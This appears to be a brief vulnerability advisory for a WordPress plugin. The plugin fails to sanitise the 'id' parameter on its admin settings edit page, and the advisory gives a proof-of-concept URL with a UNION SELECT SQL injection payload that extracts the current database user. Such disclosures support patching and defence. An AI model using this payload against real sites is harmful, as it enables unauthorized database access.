The plugin does not sanitise or escape the id GET parameter before using it in a SQL statement, when retrieving the setting to edit in the admin dashboard, leading to an authenticated SQL Injection
https://example.com/wp-admin/admin.php?page=wpcui-manage-settings&action=edit&id=-7418+UNION+ALL+SELECT+NULL%2Ccurrent_user()%2Ccurrent_user()%2CNULL%2CNULL%2CNULL